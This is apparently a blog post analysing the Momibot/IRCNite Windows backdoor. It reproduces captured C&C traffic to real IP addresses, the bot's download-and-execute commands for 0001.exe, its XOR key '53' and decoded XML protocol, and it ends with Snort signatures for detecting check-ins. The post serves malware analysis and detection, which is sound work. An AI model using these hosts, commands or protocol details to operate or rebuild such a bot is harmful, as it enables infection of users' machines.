The malware sample i am going to be looking at today is classified as Backdoor:Win32/Momibot by Microsoft and also referred to as Backdoor/IRCNite by some other AV vendors.
Packet captures of the sample from my automated sandbox results look something like this -
So, basically the Trojan is communicating on TCP ports 8090 as well as 80. Forcing wireshark to decode packets with TCP port 8090 as HTTP we get a bunch of Requests like -
POST /v4/index.php HTTP/1.0
Host: 203.146.253.110
Content-Type: text/xml
Content-Length: 137
byE8PCdtbyM6PTRzOjdudGBmZmpqYGpjYGp0fG1vfCE8PCdt
And responses -
HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Wed, 03 Aug 2011 06:58:52 GMT
Content-Type: text/xml
Connection: close
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Content-Length: 56
Content-Disposition: inline
HBhvITw8J21jbzckczk6N250YmRrY2pkYGFqZHRtbzonNj5tOycnI2l8fGtifWJkZH1gYH1qa3xjY2NifTYrNm98Oic2Pm1vfDckbW8+Oj0gJ3M5OjdudGdia2VmZmVqY3RtbzonNj5tOycnI2l8fDg9PCQ/Njc0NiU6NiR9Oj01PHwyITIxOjB8MCAgfCcyMSB9MCAgb3w6JzY+bW98Pjo9ICdtb3whPDwnbQ==
Now, this looks like a base64 encoded HTTP “POST” request. Firing up Malzilla and using the built-in base64 decoder we get -
o!<<'mco7$s9:7ntbdkcjd`ajdtmo:'6>m;''#i||kb}bdd}``}jk|cccb}6+6o|:'6>mo|7$mo>:= 's9:7ntgbkeffejctmo:'6>m;''#i||8=<$?6746%:6$}:=5<|2!21:0|0 |'21 }0 o|:'6>mo|>:= 'mo|!<<'m
Darn ! some sort of encryption I guess. While this may look like a dead-end, the next couple of HTTP Requests have some clues as to what’s happening here -
GET /0001.exe HTTP/1.0
Host: 81.177.33.98
Content-Type: text/xml
Content-Length: 0
So, looks like the Bot is fetching this EXE. Taking a wild shot here and with the following assumptions -
- The C&C issuing commands to the Bot to download 0001.exe
- Simple XOR based encryption
lets try to brute force the base64 decoded response and see if we can get the XOR key in Malzilla.
And Voila – the key is “53” ! Agreed that I am not always that lucky, but hey this just saved me tons of time that I would have wasted reversing the binary which by the way is packed with “PEcompact 2.xx”.
So, now that we know that the Bot using simple XOR+base64 encoding for communicating with its C&C, we can completely decode the communication protocol. Turns out its XML ! Here is what the communication looks like -
CLIENT / SERVER
<root><binfo id='3559939039' nt='1' bv='4.6' lt='LAN' os='Windows XP Professional '> </binfo></root>
OK<root>0<tsync id='1312354849'/></root><root><ping id='3559939039'/></root>
OK<root>0<dw jid='1780973297'> <item>http://xx.xx.xx.yy/0001.exe</item> </dw><minstjid='418655690'><item>http://knowledgeview.info/arabic/css/tabs.css</item></minst></root>
<root><jresp id='3559939039'><item jid='1780973297' jstat='4'/><item jid='418655690' jstat='4'/></jresp></root>
OK0<root><jresp id='3559939039'><item jid='1780973297' jstat='1'/></jresp></root>
OK0<root><jresp id='3559939039'><item jid='418655690' jstat='1'/></jresp></root>
OK0
There is also hint of XML being used in the HTTP Request itself via the “content-type:” parameter. However, looks like the malware author forgot he was going to use encryption ;) All the samples that I analyzed so far on my setup had the XOR key hardcoded to “53”. Pretty lame huh ?! – cause you can completely automate this process using a simple python script which can be used for checking new commands sent out by C&C.
You can find the full script at http://pastebin.com/N6gJz0Jv
Before starting communication with the C&C, this Trojan checks for presence of UPNP devices on the network which I think it does to figure out if its connecting from LAN or PPP connections at home. Based on this the Trojan may change behavior. At the time of this analysis the C&C was instructing the Bot to download Win32/FakeRean (belonging to the FakeAV family) malware.
Time to sig this bad boy – Even though it may seem that Trojan is using encryption, it is still possible to create IDS signature as long as the XOR key remains the same. This is because XOR+base64 encode of the initial (XML) string will always be the same. Based on this we can use 2 patterns - “<root><binfo id=” and “<root><ping id=” for creating the signatures -
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Backdoor:Win32/Momibot checkin"; flow:established,to_server; content:"POST"; http_method; uricontent:"index.php"; nocase; content:"byE8PCdtbzE6PTU8czo3"; http_client_body; nocase; classtype: trojan-activity; sid:xxxxxxxxxx; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Backdoor:Win32/Momibot Ping request"; flow:established,to_server; content:"POST"; http_method; uricontent:"index.php"; nocase; content:"byE8PCdtbyM6PTRzOjdu"; http_client_body; nocase; classtype: trojan-activity; sid:xxxxxxxxxxx; rev:1;)
Sometimes, dynamic analysis can give quite a head-start when it come to analyzing Malware ! If you see more samples of this family in wild using different XOR key, please do drop me note. Have fun with the script ! :)